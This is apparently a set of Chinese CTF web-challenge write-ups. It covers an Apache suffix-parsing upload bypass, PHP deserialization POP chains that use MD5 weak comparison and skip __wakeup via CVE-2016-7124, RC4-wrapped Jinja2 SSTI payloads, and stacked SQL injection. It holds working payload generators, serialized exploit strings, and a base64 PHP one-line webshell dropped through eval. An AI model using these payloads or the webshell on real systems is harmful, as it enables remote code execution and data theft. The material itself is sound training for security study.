[UUCTF 2022 新生赛]ez_upload
Apache 解析漏洞(作者记为 apache cve2017)。注意区分两件事:CVE-2017-15715 是 Apache httpd 的换行解析问题(文件名末尾带 `%0a` 可绕过 `<FilesMatch "\.php$">` 这类后缀校验);而"多后缀解析"(如 `1.php.jpg` 被当作 PHP 执行)是 mod_mime 的配置问题,`AddHandler` 会对文件名中的每个后缀都匹配。
本题的做法是把文件名改成 1.jpg.php,图片内容就会按 PHP 解析——很抽象的一个洞;具体绕过的是上传点的哪种校验,要结合题目的过滤逻辑确认。
蚁剑直接连
[SWPUCTF 2022 新生赛]ez_1zpop
<?php
error_reporting(0);

// Dead-end gadget: the object that __wakeup() forces into lt::$impo.
// Its fmm() only returns a string, so a chain that lands here executes nothing.
class dxg
{
    function fmm()
    {
        return "nonono";
    }
}

// Entry gadget. Intended chain:
//   unserialize() -> __wakeup() ... -> __destruct() -> echo $this -> __toString() -> $impo->fmm()
class lt
{
    public $impo='hi';
    public $md51='weclome';
    public $md52='to NSS';
    function __construct()
    {
        $this->impo = new dxg;
    }
    // Runs right after unserialize() and overwrites $impo with a dxg, so an
    // attacker-supplied $impo is discarded unless __wakeup() is skipped.
    // (A declared property count that does not match the real one skipped
    // __wakeup() on PHP < 5.6.25 / < 7.0.10, CVE-2016-7124 — newer versions
    // also suppress __destruct() in that case; verify the target's version.)
    function __wakeup()
    {
        $this->impo = new dxg;
        return $this->impo->fmm();
    }
    // Loose `==` on two MD5 hex strings: hashes of the form 0e<digits> are numeric
    // strings and compare equal to each other (both evaluate to 0), while the
    // plaintexts still differ. That is the "md5 weak comparison" the chain needs.
    function __toString()
    {
        if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
            return $this->impo->fmm();
    }
    // `echo $this` invokes __toString() when the object is destroyed.
    function __destruct()
    {
        echo $this;
    }
}

// Sink: fmm() calls whatever $a holds as a function, with $title as the argument
// (e.g. $a = 'system', $title = 'cat /flag').
class fin
{
    public $a;
    public $url = 'https://www.ctfer.vip';
    public $title;
    function fmm()
    {
        $b = $this->a;
        $b($this->title);
    }
}

// Untrusted input goes straight into unserialize(): PHP object injection.
// (Never unserialize() user-controlled data; exchange data with json_decode().)
if (isset($_GET['NSS'])) {
    $Data = unserialize($_GET['NSS']);
} else {
    highlight_file(__file__);
}
重点是 md5 的弱比较:`md5($md51) == md5($md52)` 用的是 `==`,当两个 MD5 都形如 `0e` 开头且后面全是数字时会被当作数值 0 比较,于是相等,而 `$md51 != $md52` 仍然成立;下面脚本里的 s155964671a / s214587387a 就是这样一对。另外注意 lt::__wakeup() 会在反序列化后立刻把 impo 覆盖成 dxg,所以序列化串原样提交是到不了 fin::fmm() 的,需要把 lt 的属性个数改大一位来跳过 __wakeup(CVE-2016-7124,仅对 PHP < 5.6.25 / < 7.0.10 有效,需确认靶机版本)。
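<?php
error_reporting(0);

// Payload generator for the lt -> fin chain. Only class names, property names
// and their declaration order matter for serialize(); the stubs carry no methods.
class lt
{
    public $impo;
    public $md51 = "s155964671a"; // md5() = 0e342768416822451524974117254469
    public $md52 = "s214587387a"; // md5() = 0e848240448830537924465865611904 -> loosely == the one above
}
class fin
{
    public $a = "system";
    public $url = 'https://www.ctfer.vip';
    public $title = "cat /flag";
}

/**
 * Raise the declared property count of the outermost serialized object by one.
 *
 * lt::__wakeup() on the target replaces $impo with a dxg as soon as the object
 * is unserialized, which discards the fin gadget. On PHP < 5.6.25 / < 7.0.10
 * (CVE-2016-7124) a declared count that does not match the real number of
 * properties makes unserialize() skip __wakeup() while __destruct() still runs.
 * Newer interpreters also suppress __destruct() in that case, so this only
 * helps against an old target — check its PHP version.
 *
 * @param string $serialized output of serialize() for an object
 * @return string the same string with the outer property count incremented
 */
function bump_property_count($serialized)
{
    return preg_replace_callback(
        '/^O:(\d+):"([^"]*)":(\d+):/',
        function ($m) {
            return 'O:' . $m[1] . ':"' . $m[2] . '":' . ((int) $m[3] + 1) . ':';
        },
        $serialized,
        1
    );
}

$a = new lt();
$b = new fin();
$a->impo = $b; // __toString() -> $impo->fmm() -> fin::fmm() -> system('cat /flag')
echo bump_property_count(serialize($a));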
[MoeCTF 2021]unserialize
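<?php
// Start of the chain: on destruction it calls helloworld() on whatever $start holds.
class entrance
{
    public $start;
    function __construct($start)
    {
        $this->start = $start;
    }
    function __destruct()
    {
        // springboard defines no helloworld(), so this lands in springboard::__call().
        $this->start->helloworld();
    }
}
// Middle hop: any undefined method call reads the undefined property ->hs on $middle.
class springboard
{
    public $middle;
    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}
// Sink: reading any undefined property on an evil evaluates $end as PHP code.
class evil
{
    public $end;
    function __construct($end)
    {
        $this->end = $end;
    }
    function __get($Attribute)
    {
        eval($this->end); // arbitrary code execution once $end is attacker-controlled
    }
}
// Untrusted input goes straight into unserialize(): PHP object injection.
// There is no __wakeup() and no filter here, so the plain serialized chain is enough.
if(isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
}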
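<?php
// Payload generator for the entrance -> springboard -> evil chain.
// Only class and property names matter for serialize(), so the stubs carry no
// methods: nothing is executed locally while the payload is built.
class entrance
{
    public $start;
}
class springboard
{
    public $middle;
}
class evil
{
    public $end;
}

$a = new entrance();
$b = new springboard();
$c = new evil();
$a->start = $b;                                // entrance::__destruct -> $start->helloworld()
$a->start->middle = $c;                        // springboard::__call -> $middle->hs
$a->start->middle->end = "system('cat /f*');"; // evil::__get -> eval($end)
echo serialize($a);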
[NISACTF 2022]is secret
很有趣的一题,ssti与rc4结合
扫到/secret目录
猜测参数名为 secret(/secret?secret=随便一个值),故意传一个不合法的值触发报错,利用报错回显定位可疑代码
查看可疑代码
rc4加密给了密钥
import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):# print("RC4加密主函数")s_box = rc4_init_sbox(key)crypt = str(rc4_excrypt(message, s_box))return crypt
def rc4_init_sbox(key):s_box = list(range(256)) # print("原来的 s 盒:%s" % s_box)j = 0for i in range(256):j = (j + s_box[i] + ord(key[i % len(key)])) % 256s_box[i], s_box[j] = s_box[j], s_box[i]# print("混乱后的 s 盒:%s"% s_box)return s_box
def rc4_excrypt(plain, box):# print("调用加密程序成功。")res = []i = j = 0for s in plain:i = (i + 1) % 256j = (j + box[i]) % 256box[i], box[j] = box[j], box[i]t = (box[i] + box[j]) % 256k = box[t]res.append(chr(ord(s) ^ k))cipher = "".join(res)print("加密后的字符串是:%s" %quote(cipher))return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
# Encrypt the SSTI payload with the key recovered from the source; the printed
# string is (presumably) what gets submitted as the `secret` parameter.
# NOTE(review): `''.__class__.__mro__.__getitem__(2)` only resolves to `object`
# on Python 2 (mro is str, basestring, object), and `.pop(40)` picks `file` by
# index, which is version-specific — confirm against the target before reuse.
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
#rc4_main("HereIsTreasure","{{lipsum|attr(\"__globals__\")|attr(\"__getitem__\")(\"os\")|attr(\"popen\")(\"cat /f*\")|attr(\"read\")()}}")
# The alternative payload above (os.popen via lipsum.__globals__) also works.
结果为
加密后的字符串是:.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92
然后再传入数值就出了
[天翼杯 2021]esay_eval
一道很有意思的反序列化题目,卡了我一宿
<?php
// Sink: calling any undefined method on an A runs eval() on $code.
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);}
    // Fires right after unserialize() and empties $code, so a payload only
    // works if __wakeup() does not run.
    function __wakeup(){
        $this->code = "";
    }
}
// Trigger: when a B is destroyed it calls ->a() on $this->a. With an A in $a,
// a() is undefined and A::__call() above executes $code.
class B{
    function __destruct(){
        echo $this->a->a();
    }
}

if(isset($_REQUEST['poc'])){
    // Filter: every `"A":N:` / `"B":N:` in the raw payload must declare exactly
    // one property, meant to block the property-count trick that skips __wakeup().
    // Two gaps are visible right here: the pattern has no /i flag while PHP
    // resolves class names case-insensitively, so `"a"` / `"b"` are never matched;
    // and it is a regex over the raw string, not a structural check.
    // isset($ret[1]) is always true after preg_match_all(), so the loop always runs.
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        // Untrusted input goes straight into unserialize(): PHP object injection.
        unserialize($_REQUEST['poc']);
    }
} else {
    highlight_file(__FILE__);
}
构造验证 pop 链。注意:脚本原样输出的是 `"B":1` / `"A":1`,能过正则但 __wakeup() 会把 code 清空;下面这条是手工改过的 payload——类名改成小写(PHP 类名不区分大小写,而正则 `"[BA]"` 没有 /i,匹配不到小写),属性个数改成 2 让 __wakeup() 不执行(CVE-2016-7124,仅 PHP < 5.6.25 / < 7.0.10 有效,需确认靶机版本)。
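<?php
// Payload generator for B::__destruct -> A::__call -> eval($code).
// The stubs carry no methods on purpose: the original generator re-declared
// __destruct()/__call(), so when it exited its own B object ran the payload
// locally. serialize() needs only the class and property names.
class A
{
    public $code = "";
}
class B
{
    public $a;
}

/**
 * Rewrite a serialized A/B chain so it passes the server filter and skips __wakeup().
 *
 * The server rejects any `"A":N:` / `"B":N:` whose N is not 1, to block the
 * property-count trick. Two properties of that check are used here:
 *  - the regex has no /i flag while PHP resolves class names case-insensitively,
 *    so `"a"` / `"b"` are not matched at all;
 *  - with the names out of the regex's reach, the declared count is raised by
 *    one: on PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124) the mismatch skips
 *    __wakeup() (which would otherwise empty $code) while __destruct() still
 *    fires. Newer interpreters also suppress __destruct() — verify the target.
 *
 * @param string $serialized output of serialize()
 * @return string the payload with lower-cased A/B names and counts incremented
 */
function evade_wakeup_filter($serialized)
{
    return preg_replace_callback(
        '/O:(\d+):"([AB])":(\d+):/',
        function ($m) {
            return 'O:' . $m[1] . ':"' . strtolower($m[2]) . '":' . ((int) $m[3] + 1) . ':';
        },
        $serialized
    );
}

$a = new A();
$b = new B();
$a->code = "phpinfo();";
$b->a = $a;
echo evade_wakeup_filter(serialize($b));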
O:1:"b":2:{s:1:"a";O:1:"a":2:{s:4:"code";s:10:"phpinfo();";}}
能执行那可以做的事就多了,直接上传一句话木马
构造pop
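<?php
// Payload generator for B::__destruct -> A::__call -> eval($code), where $code
// writes a one-line webshell (@eval($_POST['pass'])) into dotast.php on the target.
// The stubs carry no methods on purpose: the original generator re-declared
// __destruct()/__call(), so when it exited its own B object ran the payload and
// dropped dotast.php into the *local* working directory. serialize() needs only
// the class and property names.
class A
{
    public $code = "";
}
class B
{
    public $a;
}

/**
 * Rewrite a serialized A/B chain so it passes the server filter and skips __wakeup().
 *
 * The server rejects any `"A":N:` / `"B":N:` whose N is not 1, to block the
 * property-count trick. Two properties of that check are used here:
 *  - the regex has no /i flag while PHP resolves class names case-insensitively,
 *    so `"a"` / `"b"` are not matched at all;
 *  - with the names out of the regex's reach, the declared count is raised by
 *    one: on PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124) the mismatch skips
 *    __wakeup() (which would otherwise empty $code) while __destruct() still
 *    fires. Newer interpreters also suppress __destruct() — verify the target.
 *
 * @param string $serialized output of serialize()
 * @return string the payload with lower-cased A/B names and counts incremented
 */
function evade_wakeup_filter($serialized)
{
    return preg_replace_callback(
        '/O:(\d+):"([AB])":(\d+):/',
        function ($m) {
            return 'O:' . $m[1] . ':"' . strtolower($m[2]) . '":' . ((int) $m[3] + 1) . ':';
        },
        $serialized
    );
}

$a = new A();
$b = new B();
// Keep the literal on one line: base64_decode() tolerates stray whitespace, but a
// line break inside the string changes its length and therefore the s:N prefix
// that unserialize() validates.
$a->code = "fputs(fopen('dotast.php','w'),base64_decode(\"PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOw==\"));";
$b->a = $a;
echo evade_wakeup_filter(serialize($b));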
O:1:"b":2:{s:1:"a";O:1:"a":2:{s:4:"code";s:89:"fputs(fopen('dotast.php','w'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOw=="));";}}
(注:原文此处两处属性个数后面漏了冒号,应为 `2:{`;`s:N` 必须与 code 字符串的实际字节数一致,否则 unserialize 直接失败——上面 base64 串内不含空白时长度为 89,原文的 91 应是串内夹带了换行等空白字节所致,base64_decode 非严格模式会忽略它们,所以当时仍能解出。)
上传后发现权限受限,只有 /var/www/html 下文件的读取权。之后尝试用 redis 加载提权 exp,但没成——没有 load(MODULE LOAD)就加载不了 exp;又尝试 mail 那条路,试了才发现 phpinfo 里 disable_functions 把 mail 禁了;最后直接用 disable_functions 绕过(如蚁剑的绕过插件)一把梭就出了。
[强网杯 2019]随便注
总感觉在哪里做过这题,太熟悉了
根据题目提醒,发现存在堆叠注入
继续查看列数据
然后问题就是怎么读取flag了,“1';select flag from `1919810931114514`;"?,但这似乎被过滤了
我看wp有两个思路
一个是用 alter 修改表名/列名:把 flag 所在的表改名成 words、把 flag 列改名成 id,让原有查询直接把 flag 带出来;但 NSS 靶场似乎改过题目,alter 会破坏靶场环境,慎用。
1';alter table words rename words1;alter table 1919810931114514 rename words;alter table words change flag id varchar(60);#
1' or '1'='1
原理就就是
修改words表名为其他的
alter table words rename words1;
修改1919810931114514表名为words
alter table 1919810931114514 rename words;
修改新的words表中的flag列名为id
alter table words change flag id varchar(60);
得到最终payload 1';alter table words rename words1;alter table
1919810931114514 rename words;alter table words change flag id varchar(60);#
第二种思路是编码与等价语句绕过:先把 `select * from \`1919810931114514\`` 编成十六进制(下面的 0x7365...60 解码后就是这条语句),再用 prepare/execute 预处理执行,这样请求里不出现被过滤的 select 关键字;或者用 handler 语句直接逐行读表,根本不经过 select。`SeT` 混写大小写,推测是为了绕过大小写敏感的关键字检查。
';SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;
1';handler `1919810931114514` open;handler `1919810931114514` read next;